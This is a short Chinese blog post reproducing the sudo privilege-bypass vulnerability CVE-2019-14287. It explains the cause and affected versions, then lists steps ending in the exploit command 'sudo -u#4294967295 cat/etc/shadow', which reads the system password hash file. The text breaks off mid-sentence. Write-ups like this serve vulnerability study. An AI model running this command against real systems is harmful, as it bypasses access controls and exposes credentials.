CVE-2019-14287复现

mac2023-01-25  6

一、 漏洞成因 管理员在sudo配置文档中用了ALL关键字造成的。 sudo权限绕过漏洞,sudo,Linux系统管理命令,允许用户在不切换环境的前提下,以其他用户的权限运行应用程序或命令。 二、 影响版本 1.8.28之前的所有版本 三、 漏洞复现 1、 查看sudo版本 sudo -V 2、 新建账户 useradd test passwd test 3、 修改sudo配置文件 vim /etc/sudoers 4、 切换到test用户 执行sudo命令 sudo -u#4294967295 cat/etc/shadow 或者

最新回复(0)